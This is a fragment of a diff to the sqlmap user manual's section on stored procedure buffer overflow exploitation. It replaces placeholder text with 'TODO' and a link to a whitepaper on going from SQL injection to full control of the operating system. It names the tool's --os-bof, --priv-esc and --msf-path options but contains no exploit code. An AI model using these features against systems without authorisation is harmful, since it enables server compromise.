<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
|
||||||
<sect2>Stored procedure buffer overflow exploitation
|
<sect2>Stored procedure buffer overflow exploitation
|
||||||
|
@ -3902,7 +4022,11 @@ This paragraph will be written for sqlmap 0.7 stable version, refer to the white
|
||||||
Options: <tt>--os-bof</tt>, <tt>--priv-esc</tt> and <tt>--msf-path</tt>
|
Options: <tt>--os-bof</tt>, <tt>--priv-esc</tt> and <tt>--msf-path</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
TODO
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
|
||||||
<sect1>Miscellaneous
|
<sect1>Miscellaneous
|
||||||
|
|